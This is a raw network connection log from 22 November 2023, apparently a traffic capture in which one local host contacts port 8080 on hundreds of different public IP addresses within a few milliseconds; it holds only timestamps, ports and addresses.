Nov 22, 2023 08:37:53.646802902 CET	54329	8080	192.168.2.23	94.100.28.50
Nov 22, 2023 08:37:53.646816015 CET	54329	8080	192.168.2.23	95.242.245.143
Nov 22, 2023 08:37:53.646816969 CET	54329	8080	192.168.2.23	62.120.186.222
Nov 22, 2023 08:37:53.646816969 CET	54329	8080	192.168.2.23	31.11.106.25
Nov 22, 2023 08:37:53.646826982 CET	54329	8080	192.168.2.23	95.33.112.150
Nov 22, 2023 08:37:53.646835089 CET	54329	8080	192.168.2.23	95.240.63.168
Nov 22, 2023 08:37:53.646841049 CET	54329	8080	192.168.2.23	62.79.51.224
Nov 22, 2023 08:37:53.646842003 CET	54329	8080	192.168.2.23	85.169.247.153
Nov 22, 2023 08:37:53.646842957 CET	54329	8080	192.168.2.23	62.201.127.226
Nov 22, 2023 08:37:53.646851063 CET	54329	8080	192.168.2.23	62.61.201.254
Nov 22, 2023 08:37:53.646856070 CET	54329	8080	192.168.2.23	62.111.65.208
Nov 22, 2023 08:37:53.646857023 CET	54329	8080	192.168.2.23	95.211.101.110
Nov 22, 2023 08:37:53.646858931 CET	54329	8080	192.168.2.23	94.65.209.219
Nov 22, 2023 08:37:53.646859884 CET	54329	8080	192.168.2.23	62.252.184.104
Nov 22, 2023 08:37:53.646869898 CET	54329	8080	192.168.2.23	95.55.83.192
Nov 22, 2023 08:37:53.646871090 CET	54329	8080	192.168.2.23	94.90.1.85
Nov 22, 2023 08:37:53.646882057 CET	54329	8080	192.168.2.23	85.5.97.122
Nov 22, 2023 08:37:53.646883011 CET	54329	8080	192.168.2.23	94.128.222.44
Nov 22, 2023 08:37:53.646883011 CET	54329	8080	192.168.2.23	85.195.245.20
Nov 22, 2023 08:37:53.646883011 CET	54329	8080	192.168.2.23	85.88.79.234
Nov 22, 2023 08:37:53.646902084 CET	54329	8080	192.168.2.23	94.194.75.166
Nov 22, 2023 08:37:53.646903992 CET	54329	8080	192.168.2.23	85.211.147.159
Nov 22, 2023 08:37:53.646903992 CET	54329	8080	192.168.2.23	95.64.97.64
Nov 22, 2023 08:37:53.646914959 CET	54329	8080	192.168.2.23	31.72.58.53
Nov 22, 2023 08:37:53.646915913 CET	54329	8080	192.168.2.23	62.40.185.126
Nov 22, 2023 08:37:53.646929979 CET	54329	8080	192.168.2.23	94.46.127.237
Nov 22, 2023 08:37:53.646941900 CET	54329	8080	192.168.2.23	31.246.26.123
Nov 22, 2023 08:37:53.646955013 CET	54329	8080	192.168.2.23	31.147.102.174
Nov 22, 2023 08:37:53.646958113 CET	54329	8080	192.168.2.23	95.132.63.149
Nov 22, 2023 08:37:53.646965027 CET	54329	8080	192.168.2.23	62.208.216.230
Nov 22, 2023 08:37:53.646966934 CET	54329	8080	192.168.2.23	94.218.248.222
Nov 22, 2023 08:37:53.646975040 CET	54329	8080	192.168.2.23	94.213.252.211
Nov 22, 2023 08:37:53.646985054 CET	54329	8080	192.168.2.23	85.54.154.148
Nov 22, 2023 08:37:53.646989107 CET	54329	8080	192.168.2.23	95.144.223.202
Nov 22, 2023 08:37:53.646997929 CET	54329	8080	192.168.2.23	31.20.192.214
Nov 22, 2023 08:37:53.647008896 CET	54329	8080	192.168.2.23	95.33.130.153
Nov 22, 2023 08:37:53.647022009 CET	54329	8080	192.168.2.23	95.20.179.239
Nov 22, 2023 08:37:53.647023916 CET	54329	8080	192.168.2.23	95.192.141.99
Nov 22, 2023 08:37:53.647023916 CET	54329	8080	192.168.2.23	85.13.219.64
Nov 22, 2023 08:37:53.647023916 CET	54329	8080	192.168.2.23	62.17.223.149
Nov 22, 2023 08:37:53.647023916 CET	54329	8080	192.168.2.23	94.20.13.218
Nov 22, 2023 08:37:53.647023916 CET	54329	8080	192.168.2.23	31.59.49.160
Nov 22, 2023 08:37:53.647038937 CET	54329	8080	192.168.2.23	31.251.68.122
Nov 22, 2023 08:37:53.647043943 CET	54329	8080	192.168.2.23	94.12.145.104
Nov 22, 2023 08:37:53.647049904 CET	54329	8080	192.168.2.23	94.227.196.159
Nov 22, 2023 08:37:53.647058010 CET	54329	8080	192.168.2.23	62.43.186.32
Nov 22, 2023 08:37:53.647064924 CET	54329	8080	192.168.2.23	31.2.243.91
Nov 22, 2023 08:37:53.647067070 CET	54329	8080	192.168.2.23	31.174.145.205
Nov 22, 2023 08:37:53.647083998 CET	54329	8080	192.168.2.23	31.128.200.62
Nov 22, 2023 08:37:53.647087097 CET	54329	8080	192.168.2.23	85.69.9.180
Nov 22, 2023 08:37:53.647098064 CET	54329	8080	192.168.2.23	31.93.125.241
Nov 22, 2023 08:37:53.647099972 CET	54329	8080	192.168.2.23	85.226.65.70
Nov 22, 2023 08:37:53.647099972 CET	54329	8080	192.168.2.23	31.161.97.230
Nov 22, 2023 08:37:53.647099972 CET	54329	8080	192.168.2.23	85.167.173.48
Nov 22, 2023 08:37:53.647109985 CET	54329	8080	192.168.2.23	85.166.161.38
Nov 22, 2023 08:37:53.647126913 CET	54329	8080	192.168.2.23	95.255.151.227
Nov 22, 2023 08:37:53.647130013 CET	54329	8080	192.168.2.23	95.173.149.40
Nov 22, 2023 08:37:53.647130013 CET	54329	8080	192.168.2.23	85.222.119.58
Nov 22, 2023 08:37:53.647130013 CET	54329	8080	192.168.2.23	31.222.135.143
Nov 22, 2023 08:37:53.647130013 CET	54329	8080	192.168.2.23	31.81.77.164
Nov 22, 2023 08:37:53.647130013 CET	54329	8080	192.168.2.23	62.181.2.149
Nov 22, 2023 08:37:53.647130013 CET	54329	8080	192.168.2.23	95.192.243.207
Nov 22, 2023 08:37:53.647130013 CET	54329	8080	192.168.2.23	94.198.65.191
Nov 22, 2023 08:37:53.647138119 CET	54329	8080	192.168.2.23	31.42.183.50
Nov 22, 2023 08:37:53.647146940 CET	54329	8080	192.168.2.23	62.52.64.178
Nov 22, 2023 08:37:53.647161007 CET	54329	8080	192.168.2.23	94.42.30.2
Nov 22, 2023 08:37:53.647172928 CET	54329	8080	192.168.2.23	94.8.189.58
Nov 22, 2023 08:37:53.647172928 CET	54329	8080	192.168.2.23	85.221.130.189
Nov 22, 2023 08:37:53.647172928 CET	54329	8080	192.168.2.23	31.179.58.57
Nov 22, 2023 08:37:53.647172928 CET	54329	8080	192.168.2.23	95.156.137.28
Nov 22, 2023 08:37:53.647172928 CET	54329	8080	192.168.2.23	94.47.133.29
Nov 22, 2023 08:37:53.647172928 CET	54329	8080	192.168.2.23	85.44.161.91
Nov 22, 2023 08:37:53.647173882 CET	54329	8080	192.168.2.23	95.147.97.97
Nov 22, 2023 08:37:53.647173882 CET	54329	8080	192.168.2.23	31.250.204.131
Nov 22, 2023 08:37:53.647173882 CET	54329	8080	192.168.2.23	31.100.103.0
Nov 22, 2023 08:37:53.647180080 CET	54329	8080	192.168.2.23	31.28.90.108
Nov 22, 2023 08:37:53.647180080 CET	54329	8080	192.168.2.23	62.63.19.121
Nov 22, 2023 08:37:53.647180080 CET	54329	8080	192.168.2.23	85.74.238.228
Nov 22, 2023 08:37:53.647181988 CET	54329	8080	192.168.2.23	85.168.228.203
Nov 22, 2023 08:37:53.647195101 CET	54329	8080	192.168.2.23	94.250.155.184
Nov 22, 2023 08:37:53.647209883 CET	54329	8080	192.168.2.23	94.212.116.42
Nov 22, 2023 08:37:53.647209883 CET	54329	8080	192.168.2.23	85.127.29.114
Nov 22, 2023 08:37:53.647209883 CET	54329	8080	192.168.2.23	94.180.217.89
Nov 22, 2023 08:37:53.647209883 CET	54329	8080	192.168.2.23	95.193.232.1
Nov 22, 2023 08:37:53.647211075 CET	54329	8080	192.168.2.23	85.134.73.10
Nov 22, 2023 08:37:53.647209883 CET	54329	8080	192.168.2.23	62.162.147.39
Nov 22, 2023 08:37:53.647209883 CET	54329	8080	192.168.2.23	31.39.159.12
Nov 22, 2023 08:37:53.647209883 CET	54329	8080	192.168.2.23	94.246.197.168
Nov 22, 2023 08:37:53.647209883 CET	54329	8080	192.168.2.23	31.87.220.53
Nov 22, 2023 08:37:53.647214890 CET	54329	8080	192.168.2.23	95.134.126.224
Nov 22, 2023 08:37:53.647217035 CET	54329	8080	192.168.2.23	95.155.17.37
Nov 22, 2023 08:37:53.647222996 CET	54329	8080	192.168.2.23	95.208.248.137
Nov 22, 2023 08:37:53.647233963 CET	54329	8080	192.168.2.23	62.115.171.20
Nov 22, 2023 08:37:53.647238970 CET	54329	8080	192.168.2.23	95.209.49.161
Nov 22, 2023 08:37:53.647238970 CET	54329	8080	192.168.2.23	62.33.100.193
Nov 22, 2023 08:37:53.647238970 CET	54329	8080	192.168.2.23	95.203.75.204
Nov 22, 2023 08:37:53.647238970 CET	54329	8080	192.168.2.23	94.245.148.39
Nov 22, 2023 08:37:53.647238970 CET	54329	8080	192.168.2.23	62.9.60.251
Nov 22, 2023 08:37:53.647238970 CET	54329	8080	192.168.2.23	85.75.229.252
Nov 22, 2023 08:37:53.647238970 CET	54329	8080	192.168.2.23	85.185.158.49
Nov 22, 2023 08:37:53.647241116 CET	54329	8080	192.168.2.23	85.102.236.161
Nov 22, 2023 08:37:53.647238970 CET	54329	8080	192.168.2.23	85.241.25.123
Nov 22, 2023 08:37:53.647241116 CET	54329	8080	192.168.2.23	94.22.133.50
Nov 22, 2023 08:37:53.647241116 CET	54329	8080	192.168.2.23	94.12.74.178
Nov 22, 2023 08:37:53.647249937 CET	54329	8080	192.168.2.23	95.171.250.202
Nov 22, 2023 08:37:53.647258043 CET	54329	8080	192.168.2.23	31.133.146.125
Nov 22, 2023 08:37:53.647267103 CET	54329	8080	192.168.2.23	62.166.28.172
Nov 22, 2023 08:37:53.647269011 CET	54329	8080	192.168.2.23	94.128.34.71
Nov 22, 2023 08:37:53.647269011 CET	54329	8080	192.168.2.23	31.247.57.82
Nov 22, 2023 08:37:53.647272110 CET	54329	8080	192.168.2.23	31.223.44.126
Nov 22, 2023 08:37:53.647272110 CET	54329	8080	192.168.2.23	85.10.110.2
Nov 22, 2023 08:37:53.647272110 CET	54329	8080	192.168.2.23	85.68.192.234
Nov 22, 2023 08:37:53.647272110 CET	54329	8080	192.168.2.23	85.214.90.178
Nov 22, 2023 08:37:53.647281885 CET	54329	8080	192.168.2.23	31.96.134.11
Nov 22, 2023 08:37:53.647281885 CET	54329	8080	192.168.2.23	94.45.211.182
Nov 22, 2023 08:37:53.647289991 CET	54329	8080	192.168.2.23	62.250.110.197
Nov 22, 2023 08:37:53.647305012 CET	54329	8080	192.168.2.23	95.23.43.203
Nov 22, 2023 08:37:53.647309065 CET	54329	8080	192.168.2.23	95.155.74.15
Nov 22, 2023 08:37:53.647319078 CET	54329	8080	192.168.2.23	85.24.86.145
Nov 22, 2023 08:37:53.647337914 CET	54329	8080	192.168.2.23	62.6.33.53
Nov 22, 2023 08:37:53.647341967 CET	54329	8080	192.168.2.23	85.186.109.79
Nov 22, 2023 08:37:53.647346020 CET	54329	8080	192.168.2.23	62.30.99.17
Nov 22, 2023 08:37:53.647346020 CET	54329	8080	192.168.2.23	94.82.255.79
Nov 22, 2023 08:37:53.647346020 CET	54329	8080	192.168.2.23	94.177.99.194
Nov 22, 2023 08:37:53.647356033 CET	54329	8080	192.168.2.23	95.77.186.235
Nov 22, 2023 08:37:53.647356987 CET	54329	8080	192.168.2.23	94.86.140.166
Nov 22, 2023 08:37:53.647361040 CET	54329	8080	192.168.2.23	95.249.253.74
Nov 22, 2023 08:37:53.647372961 CET	54329	8080	192.168.2.23	95.68.161.82
Nov 22, 2023 08:37:53.647383928 CET	54329	8080	192.168.2.23	95.1.55.66
Nov 22, 2023 08:37:53.647386074 CET	54329	8080	192.168.2.23	85.4.155.39
Nov 22, 2023 08:37:53.647397041 CET	54329	8080	192.168.2.23	62.190.143.225
Nov 22, 2023 08:37:53.647399902 CET	54329	8080	192.168.2.23	62.191.21.93
Nov 22, 2023 08:37:53.647423029 CET	54329	8080	192.168.2.23	31.51.152.23
Nov 22, 2023 08:37:53.647423029 CET	54329	8080	192.168.2.23	62.181.223.103
Nov 22, 2023 08:37:53.647423029 CET	54329	8080	192.168.2.23	85.88.50.128
Nov 22, 2023 08:37:53.647432089 CET	54329	8080	192.168.2.23	94.70.252.248
Nov 22, 2023 08:37:53.647440910 CET	54329	8080	192.168.2.23	95.156.52.172
Nov 22, 2023 08:37:53.647452116 CET	54329	8080	192.168.2.23	31.132.161.46
Nov 22, 2023 08:37:53.647461891 CET	54329	8080	192.168.2.23	95.253.23.105
Nov 22, 2023 08:37:53.647463083 CET	54329	8080	192.168.2.23	95.241.105.240
Nov 22, 2023 08:37:53.647463083 CET	54329	8080	192.168.2.23	95.142.221.157
Nov 22, 2023 08:37:53.647478104 CET	54329	8080	192.168.2.23	94.234.163.134
Nov 22, 2023 08:37:53.647478104 CET	54329	8080	192.168.2.23	31.38.87.229
Nov 22, 2023 08:37:53.647480965 CET	54329	8080	192.168.2.23	95.19.103.72
Nov 22, 2023 08:37:53.647485971 CET	54329	8080	192.168.2.23	95.167.35.232
Nov 22, 2023 08:37:53.647495985 CET	54329	8080	192.168.2.23	95.73.158.134
Nov 22, 2023 08:37:53.647502899 CET	54329	8080	192.168.2.23	94.146.158.44
Nov 22, 2023 08:37:53.647502899 CET	54329	8080	192.168.2.23	95.188.162.186
Nov 22, 2023 08:37:53.647515059 CET	54329	8080	192.168.2.23	62.16.154.10
Nov 22, 2023 08:37:53.647522926 CET	54329	8080	192.168.2.23	62.253.96.2
Nov 22, 2023 08:37:53.647537947 CET	54329	8080	192.168.2.23	95.44.179.55
Nov 22, 2023 08:37:53.647552967 CET	54329	8080	192.168.2.23	85.99.33.192
Nov 22, 2023 08:37:53.647553921 CET	54329	8080	192.168.2.23	85.72.176.239
Nov 22, 2023 08:37:53.647556067 CET	54329	8080	192.168.2.23	85.237.169.114
Nov 22, 2023 08:37:53.647563934 CET	54329	8080	192.168.2.23	85.194.86.88
Nov 22, 2023 08:37:53.647564888 CET	54329	8080	192.168.2.23	31.117.87.47
Nov 22, 2023 08:37:53.647568941 CET	54329	8080	192.168.2.23	31.128.58.46
Nov 22, 2023 08:37:53.647584915 CET	54329	8080	192.168.2.23	85.250.60.61
Nov 22, 2023 08:37:53.647594929 CET	54329	8080	192.168.2.23	85.93.0.66
Nov 22, 2023 08:37:53.647597075 CET	54329	8080	192.168.2.23	62.21.17.125
Nov 22, 2023 08:37:53.647599936 CET	54329	8080	192.168.2.23	62.197.172.168
Nov 22, 2023 08:37:53.647608042 CET	54329	8080	192.168.2.23	31.118.198.112
Nov 22, 2023 08:37:53.647608995 CET	54329	8080	192.168.2.23	62.239.219.152
Nov 22, 2023 08:37:53.647614002 CET	54329	8080	192.168.2.23	95.109.87.23
Nov 22, 2023 08:37:53.647623062 CET	54329	8080	192.168.2.23	31.47.152.31
Nov 22, 2023 08:37:53.647627115 CET	54329	8080	192.168.2.23	62.35.125.133
Nov 22, 2023 08:37:53.647634983 CET	54329	8080	192.168.2.23	95.22.74.62
Nov 22, 2023 08:37:53.647644043 CET	54329	8080	192.168.2.23	31.189.223.162
Nov 22, 2023 08:37:53.647644043 CET	54329	8080	192.168.2.23	31.101.214.145
Nov 22, 2023 08:37:53.647644043 CET	54329	8080	192.168.2.23	85.49.217.153
Nov 22, 2023 08:37:53.647654057 CET	54329	8080	192.168.2.23	94.206.52.61
Nov 22, 2023 08:37:53.647656918 CET	54329	8080	192.168.2.23	85.152.12.212
Nov 22, 2023 08:37:53.647669077 CET	54329	8080	192.168.2.23	95.147.134.79
Nov 22, 2023 08:37:53.647670031 CET	54329	8080	192.168.2.23	31.196.162.4
Nov 22, 2023 08:37:53.647686958 CET	54329	8080	192.168.2.23	94.167.69.17
Nov 22, 2023 08:37:53.647686958 CET	54329	8080	192.168.2.23	95.194.130.203
Nov 22, 2023 08:37:53.647686958 CET	54329	8080	192.168.2.23	95.80.99.106
Nov 22, 2023 08:37:53.647691965 CET	54329	8080	192.168.2.23	94.52.43.33
Nov 22, 2023 08:37:53.647705078 CET	54329	8080	192.168.2.23	95.249.19.39
Nov 22, 2023 08:37:53.647710085 CET	54329	8080	192.168.2.23	85.116.128.172
Nov 22, 2023 08:37:53.647710085 CET	54329	8080	192.168.2.23	62.43.105.155
Nov 22, 2023 08:37:53.647725105 CET	54329	8080	192.168.2.23	85.215.12.166
Nov 22, 2023 08:37:53.647726059 CET	54329	8080	192.168.2.23	31.195.129.109
Nov 22, 2023 08:37:53.647742987 CET	54329	8080	192.168.2.23	95.165.192.245
Nov 22, 2023 08:37:53.647742987 CET	54329	8080	192.168.2.23	62.195.102.46
Nov 22, 2023 08:37:53.647742987 CET	54329	8080	192.168.2.23	94.170.32.115
Nov 22, 2023 08:37:53.647742987 CET	54329	8080	192.168.2.23	31.17.121.82
Nov 22, 2023 08:37:53.647757053 CET	54329	8080	192.168.2.23	62.181.146.172
Nov 22, 2023 08:37:53.647774935 CET	54329	8080	192.168.2.23	95.22.193.63
Nov 22, 2023 08:37:53.647775888 CET	54329	8080	192.168.2.23	94.93.140.36
Nov 22, 2023 08:37:53.647775888 CET	54329	8080	192.168.2.23	85.159.156.171
Nov 22, 2023 08:37:53.647775888 CET	54329	8080	192.168.2.23	95.231.249.49
Nov 22, 2023 08:37:53.647778034 CET	54329	8080	192.168.2.23	62.13.56.243
Nov 22, 2023 08:37:53.647782087 CET	54329	8080	192.168.2.23	95.78.103.38
Nov 22, 2023 08:37:53.647783041 CET	54329	8080	192.168.2.23	62.179.90.228
Nov 22, 2023 08:37:53.647797108 CET	54329	8080	192.168.2.23	62.168.155.228
Nov 22, 2023 08:37:53.647799015 CET	54329	8080	192.168.2.23	62.228.100.191
Nov 22, 2023 08:37:53.647808075 CET	54329	8080	192.168.2.23	95.20.125.45
Nov 22, 2023 08:37:53.647808075 CET	54329	8080	192.168.2.23	31.232.44.45
Nov 22, 2023 08:37:53.647808075 CET	54329	8080	192.168.2.23	31.56.166.118
Nov 22, 2023 08:37:53.647808075 CET	54329	8080	192.168.2.23	31.77.18.46
Nov 22, 2023 08:37:53.647808075 CET	54329	8080	192.168.2.23	94.136.87.75
Nov 22, 2023 08:37:53.647808075 CET	54329	8080	192.168.2.23	94.246.27.145
Nov 22, 2023 08:37:53.647820950 CET	54329	8080	192.168.2.23	62.124.111.7
Nov 22, 2023 08:37:53.647833109 CET	54329	8080	192.168.2.23	94.75.162.101
Nov 22, 2023 08:37:53.647834063 CET	54329	8080	192.168.2.23	62.255.35.5
Nov 22, 2023 08:37:53.647846937 CET	54329	8080	192.168.2.23	94.252.18.32
Nov 22, 2023 08:37:53.647866011 CET	54329	8080	192.168.2.23	31.199.11.8
Nov 22, 2023 08:37:53.647866011 CET	54329	8080	192.168.2.23	31.197.125.57
Nov 22, 2023 08:37:53.647867918 CET	54329	8080	192.168.2.23	95.115.145.136
Nov 22, 2023 08:37:53.647867918 CET	54329	8080	192.168.2.23	85.110.141.238
Nov 22, 2023 08:37:53.647867918 CET	54329	8080	192.168.2.23	85.106.140.78
Nov 22, 2023 08:37:53.647877932 CET	54329	8080	192.168.2.23	31.160.131.84
Nov 22, 2023 08:37:53.647881031 CET	54329	8080	192.168.2.23	62.252.164.239
Nov 22, 2023 08:37:53.647911072 CET	54329	8080	192.168.2.23	94.137.29.157
Nov 22, 2023 08:37:53.647911072 CET	54329	8080	192.168.2.23	95.70.72.21
Nov 22, 2023 08:37:53.647911072 CET	54329	8080	192.168.2.23	95.90.101.207
Nov 22, 2023 08:37:53.647911072 CET	54329	8080	192.168.2.23	85.176.249.30
Nov 22, 2023 08:37:53.647912979 CET	54329	8080	192.168.2.23	94.195.197.59
Nov 22, 2023 08:37:53.647916079 CET	54329	8080	192.168.2.23	95.113.138.194
Nov 22, 2023 08:37:53.647926092 CET	54329	8080	192.168.2.23	85.192.213.122
Nov 22, 2023 08:37:53.647926092 CET	54329	8080	192.168.2.23	62.234.133.211
Nov 22, 2023 08:37:53.647926092 CET	54329	8080	192.168.2.23	85.236.126.132
Nov 22, 2023 08:37:53.647943974 CET	54329	8080	192.168.2.23	31.102.213.97
Nov 22, 2023 08:37:53.647943974 CET	54329	8080	192.168.2.23	95.136.122.82
Nov 22, 2023 08:37:53.647965908 CET	54329	8080	192.168.2.23	62.93.27.252
Nov 22, 2023 08:37:53.647965908 CET	54329	8080	192.168.2.23	85.228.19.3
Nov 22, 2023 08:37:53.647965908 CET	54329	8080	192.168.2.23	94.37.155.61
Nov 22, 2023 08:37:53.647983074 CET	54329	8080	192.168.2.23	62.0.49.44
Nov 22, 2023 08:37:53.647984028 CET	54329	8080	192.168.2.23	94.152.250.175
Nov 22, 2023 08:37:53.647984028 CET	54329	8080	192.168.2.23	94.66.215.120
Nov 22, 2023 08:37:53.647984028 CET	54329	8080	192.168.2.23	31.55.34.3
Nov 22, 2023 08:37:53.647996902 CET	54329	8080	192.168.2.23	62.30.158.148
Nov 22, 2023 08:37:53.648015976 CET	54329	8080	192.168.2.23	85.88.229.255
Nov 22, 2023 08:37:53.648025036 CET	54329	8080	192.168.2.23	95.193.100.224
Nov 22, 2023 08:37:53.648041964 CET	54329	8080	192.168.2.23	62.140.85.75
Nov 22, 2023 08:37:53.648042917 CET	54329	8080	192.168.2.23	95.62.82.26
Nov 22, 2023 08:37:53.648052931 CET	54329	8080	192.168.2.23	95.130.142.234
Nov 22, 2023 08:37:53.648055077 CET	54329	8080	192.168.2.23	85.182.141.88
Nov 22, 2023 08:37:53.648055077 CET	54329	8080	192.168.2.23	95.111.114.204
Nov 22, 2023 08:37:53.648056984 CET	54329	8080	192.168.2.23	94.167.15.123
Nov 22, 2023 08:37:53.648056984 CET	54329	8080	192.168.2.23	62.242.227.120
Nov 22, 2023 08:37:53.648061991 CET	54329	8080	192.168.2.23	31.98.8.182
Nov 22, 2023 08:37:53.648062944 CET	54329	8080	192.168.2.23	31.240.233.216
Nov 22, 2023 08:37:53.648066044 CET	54329	8080	192.168.2.23	95.209.206.3
Nov 22, 2023 08:37:53.648077011 CET	54329	8080	192.168.2.23	94.148.12.121
Nov 22, 2023 08:37:53.648081064 CET	54329	8080	192.168.2.23	85.8.78.65
Nov 22, 2023 08:37:53.648087025 CET	54329	8080	192.168.2.23	85.63.146.110
Nov 22, 2023 08:37:53.648097038 CET	54329	8080	192.168.2.23	95.140.186.141
Nov 22, 2023 08:37:53.648102999 CET	54329	8080	192.168.2.23	95.42.35.81
Nov 22, 2023 08:37:53.648107052 CET	54329	8080	192.168.2.23	85.96.146.241
Nov 22, 2023 08:37:53.648116112 CET	54329	8080	192.168.2.23	94.250.213.167
Nov 22, 2023 08:37:53.648124933 CET	54329	8080	192.168.2.23	62.113.73.199
Nov 22, 2023 08:37:53.648133993 CET	54329	8080	192.168.2.23	85.57.229.159
Nov 22, 2023 08:37:53.648156881 CET	54329	8080	192.168.2.23	94.169.52.87
Nov 22, 2023 08:37:53.648156881 CET	54329	8080	192.168.2.23	85.140.31.163
Nov 22, 2023 08:37:53.648161888 CET	54329	8080	192.168.2.23	85.225.173.227
Nov 22, 2023 08:37:53.648161888 CET	54329	8080	192.168.2.23	62.171.81.13
Nov 22, 2023 08:37:53.648163080 CET	54329	8080	192.168.2.23	94.131.70.85
Nov 22, 2023 08:37:53.648180008 CET	54329	8080	192.168.2.23	94.131.214.5
Nov 22, 2023 08:37:53.648195028 CET	54329	8080	192.168.2.23	62.190.80.124
Nov 22, 2023 08:37:53.648202896 CET	54329	8080	192.168.2.23	95.223.78.111
Nov 22, 2023 08:37:53.648211002 CET	54329	8080	192.168.2.23	31.149.36.5
Nov 22, 2023 08:37:53.648225069 CET	54329	8080	192.168.2.23	85.123.132.34
Nov 22, 2023 08:37:53.648225069 CET	54329	8080	192.168.2.23	95.131.175.125
Nov 22, 2023 08:37:53.648226023 CET	54329	8080	192.168.2.23	85.65.45.157
Nov 22, 2023 08:37:53.648241043 CET	54329	8080	192.168.2.23	94.110.73.218
Nov 22, 2023 08:37:53.648241997 CET	54329	8080	192.168.2.23	95.57.192.137
Nov 22, 2023 08:37:53.648255110 CET	54329	8080	192.168.2.23	31.0.6.193
Nov 22, 2023 08:37:53.648257971 CET	54329	8080	192.168.2.23	94.31.106.212
Nov 22, 2023 08:37:53.648271084 CET	54329	8080	192.168.2.23	95.35.84.86
Nov 22, 2023 08:37:53.648272038 CET	54329	8080	192.168.2.23	85.201.17.39
Nov 22, 2023 08:37:53.648274899 CET	54329	8080	192.168.2.23	62.82.153.172
Nov 22, 2023 08:37:53.648274899 CET	54329	8080	192.168.2.23	95.113.251.42
Nov 22, 2023 08:37:53.648274899 CET	54329	8080	192.168.2.23	95.122.169.97
Nov 22, 2023 08:37:53.648281097 CET	54329	8080	192.168.2.23	94.130.139.35
Nov 22, 2023 08:37:53.648291111 CET	54329	8080	192.168.2.23	31.142.24.37
Nov 22, 2023 08:37:53.648297071 CET	54329	8080	192.168.2.23	85.158.192.209
Nov 22, 2023 08:37:53.648297071 CET	54329	8080	192.168.2.23	85.6.34.194
Nov 22, 2023 08:37:53.648297071 CET	54329	8080	192.168.2.23	95.36.242.68
Nov 22, 2023 08:37:53.648302078 CET	54329	8080	192.168.2.23	85.6.207.198
Nov 22, 2023 08:37:53.648312092 CET	54329	8080	192.168.2.23	95.228.34.34
Nov 22, 2023 08:37:53.648313046 CET	54329	8080	192.168.2.23	85.163.142.74
Nov 22, 2023 08:37:53.648314953 CET	54329	8080	192.168.2.23	85.63.77.221
Nov 22, 2023 08:37:53.648314953 CET	54329	8080	192.168.2.23	85.145.96.68
Nov 22, 2023 08:37:53.648318052 CET	54329	8080	192.168.2.23	95.46.143.61
Nov 22, 2023 08:37:53.648324013 CET	54329	8080	192.168.2.23	94.5.242.149
Nov 22, 2023 08:37:53.648330927 CET	54329	8080	192.168.2.23	62.169.142.63
Nov 22, 2023 08:37:53.648346901 CET	54329	8080	192.168.2.23	31.133.60.18
Nov 22, 2023 08:37:53.648348093 CET	54329	8080	192.168.2.23	31.64.164.95
Nov 22, 2023 08:37:53.648350000 CET	54329	8080	192.168.2.23	31.7.50.215
Nov 22, 2023 08:37:53.648359060 CET	54329	8080	192.168.2.23	85.209.161.181
Nov 22, 2023 08:37:53.648359060 CET	54329	8080	192.168.2.23	62.19.38.38
Nov 22, 2023 08:37:53.648369074 CET	54329	8080	192.168.2.23	94.171.24.157
Nov 22, 2023 08:37:53.648369074 CET	54329	8080	192.168.2.23	95.167.134.156
Nov 22, 2023 08:37:53.648369074 CET	54329	8080	192.168.2.23	31.29.97.227
Nov 22, 2023 08:37:53.648391962 CET	54329	8080	192.168.2.23	85.135.180.122
Nov 22, 2023 08:37:53.648391962 CET	54329	8080	192.168.2.23	62.22.161.54
Nov 22, 2023 08:37:53.648396015 CET	54329	8080	192.168.2.23	62.254.77.200
Nov 22, 2023 08:37:53.648411036 CET	54329	8080	192.168.2.23	95.231.158.231
Nov 22, 2023 08:37:53.648426056 CET	54329	8080	192.168.2.23	95.168.101.37
Nov 22, 2023 08:37:53.648426056 CET	54329	8080	192.168.2.23	94.198.27.252
Nov 22, 2023 08:37:53.648428917 CET	54329	8080	192.168.2.23	94.5.3.137
Nov 22, 2023 08:37:53.648431063 CET	54329	8080	192.168.2.23	31.203.142.243
Nov 22, 2023 08:37:53.648443937 CET	54329	8080	192.168.2.23	85.124.168.189
Nov 22, 2023 08:37:53.648443937 CET	54329	8080	192.168.2.23	85.254.165.77
Nov 22, 2023 08:37:53.648447990 CET	54329	8080	192.168.2.23	31.232.49.217
Nov 22, 2023 08:37:53.648458004 CET	54329	8080	192.168.2.23	95.63.192.169
Nov 22, 2023 08:37:53.648458958 CET	54329	8080	192.168.2.23	85.115.196.199
Nov 22, 2023 08:37:53.648463011 CET	54329	8080	192.168.2.23	95.102.53.93
Nov 22, 2023 08:37:53.648466110 CET	54329	8080	192.168.2.23	31.200.200.170
Nov 22, 2023 08:37:53.648468971 CET	54329	8080	192.168.2.23	94.121.18.69
Nov 22, 2023 08:37:53.648473978 CET	54329	8080	192.168.2.23	94.121.239.6
Nov 22, 2023 08:37:53.648488998 CET	54329	8080	192.168.2.23	85.92.207.129
Nov 22, 2023 08:37:53.648489952 CET	54329	8080	192.168.2.23	62.141.135.23
Nov 22, 2023 08:37:53.648494005 CET	54329	8080	192.168.2.23	31.250.163.24
Nov 22, 2023 08:37:53.648509026 CET	54329	8080	192.168.2.23	31.23.104.58
Nov 22, 2023 08:37:53.648509026 CET	54329	8080	192.168.2.23	31.4.13.119
Nov 22, 2023 08:37:53.648515940 CET	54329	8080	192.168.2.23	62.190.184.61
Nov 22, 2023 08:37:53.648519993 CET	54329	8080	192.168.2.23	95.26.20.212
Nov 22, 2023 08:37:53.648521900 CET	54329	8080	192.168.2.23	85.84.176.153
Nov 22, 2023 08:37:53.648531914 CET	54329	8080	192.168.2.23	62.253.176.62
Nov 22, 2023 08:37:53.648536921 CET	54329	8080	192.168.2.23	62.198.188.105
Nov 22, 2023 08:37:53.648536921 CET	54329	8080	192.168.2.23	31.230.4.191
Nov 22, 2023 08:37:53.648550034 CET	54329	8080	192.168.2.23	94.128.123.170
Nov 22, 2023 08:37:53.648559093 CET	54329	8080	192.168.2.23	94.238.176.49
Nov 22, 2023 08:37:53.648580074 CET	54329	8080	192.168.2.23	94.246.7.251
Nov 22, 2023 08:37:53.648591042 CET	54329	8080	192.168.2.23	94.23.80.6
Nov 22, 2023 08:37:53.648591042 CET	54329	8080	192.168.2.23	94.160.155.72
Nov 22, 2023 08:37:53.648591995 CET	54329	8080	192.168.2.23	95.255.98.151
Nov 22, 2023 08:37:53.648591995 CET	54329	8080	192.168.2.23	85.123.232.11
Nov 22, 2023 08:37:53.648600101 CET	54329	8080	192.168.2.23	62.245.126.86
Nov 22, 2023 08:37:53.648600101 CET	54329	8080	192.168.2.23	94.130.244.225
